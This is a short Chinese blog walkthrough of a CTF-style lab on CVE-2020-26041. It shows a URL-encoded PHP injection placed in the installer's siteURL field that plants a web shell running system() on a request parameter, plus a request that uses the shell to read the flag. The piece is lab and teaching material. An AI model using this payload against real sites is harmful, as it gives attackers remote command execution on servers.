春秋云境CVE-2020-26041

张开发
2026/4/13 15:54:49 15 分钟阅读

分享文章

春秋云境CVE-2020-26041
1.阅读靶场介绍这里能得到的就是在安装的时候做手脚2.启动靶场如下所示3.poc直接启动bp开启代理然后点击下面的install抓包然后把底部的那串替换成如下所示代码如下siteName test siteURLhttp%3A//baidu.com/%27%29%3Bif%28%24_REQUEST%5B%27s%27%5D%29%20%7B%0A%20%20system%28%24_REQUEST%5B%27s%27%5D%29%3B%0A%20%20%7D%20else%20phpinfo%28%29%3Bexit%28%29%3B//dbNamemysqldbUserNamerootdbPassrootdbHostlocalhost然后放包即可出现如下所示证明上面的操作对了然后我们访问首页这里能得到phpinfo的页面最后就是cat flag我们使用这个路径https://eci-2ze97uygbxz09r4dfxc1.cloudeci1.ichunqiu.com/?scat%20../../../../../../../../flag这里简单说说原理在siteURL后面的部分经过 URL 解码后实际上是http://baidu.com/);if($_REQUEST[s]) { system($_REQUEST[s]); } else phpinfo();exit();//这个意思就是if($_REQUEST[s])检查请求中是否有一个名为s的参数system($_REQUEST[s])如果有则把参数s的内容当作系统命令执行如ls、whoami、cat /etc/passwd等。这是最危险的部分相当于给了攻击者服务器的命令行控制权else phpinfo()如果没有参数s就执行phpinfo()用于获取 PHP 环境的详细配置信息为后续攻击做准备到此文章也接近尾声了感谢您宝贵的时间

更多文章